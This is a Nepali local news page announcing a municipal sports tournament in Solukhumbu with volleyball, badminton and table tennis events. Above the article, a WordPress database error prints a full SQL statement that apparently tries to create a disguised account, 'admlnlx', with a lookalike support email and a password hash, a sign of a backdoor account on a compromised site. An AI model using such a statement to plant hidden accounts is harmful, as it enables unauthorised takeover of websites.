WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLuyrHk3MtTrhR/U.OFNDNAAyVhZ481', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 09:29:37', '', 'admlnlx', 'admlnlx')

चौथो अध्यक्ष रनिङ शिल्ड प्रतियोगिता २०७९ आयोजना हुने – Gaule Khabar

चौथो अध्यक्ष रनिङ शिल्ड प्रतियोगिता २०७९ आयोजना हुने

चौथो अध्यक्ष रनिङ शिल्ड प्रतियोगिता २०७९ आयोजना हुने

सोलुखुम्बु । थुलुङ दुधकोशी गाउँपालिका चौथो अध्यक्ष रनिङ शिल्ड तथा राष्ट्रपति रनिङ शिल्ड प्रतियोगिता २०७९ हुने भएको छ ।

गाउँपालिकाले खेलकुदको माध्यामबाट समाजमा आपसी सदभाब र सहिष्नुता साथै आपसी हार्दिकतालाई कायम राख्दै युवाहरुमा रहेको खेल प्रतिभालाई उजागर्न गर्ने उद्वेश्याले फाल्गुण १ देखी ६ गते सम्म कार्यक्रम सन्चालन गर्ने जनाएको छ ।

कार्यक्रममा महिला पुरुष भलिवल प्रतियोगिता, महिला तथा पुरुष ब्यटमिन्टन प्रतियोगिता, महिला त्यहाँ पुरुष टेबल टेनिस प्रतियोगिता सन्चालन गर्ने गाउँपालिकाले जनाएको छ ।

कार्यक्रममा स्थानीय तथा राष्ट्रिय कलाकारहरुको उपस्तिथिमा सांगीतिक साझ रहने आयोजकले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका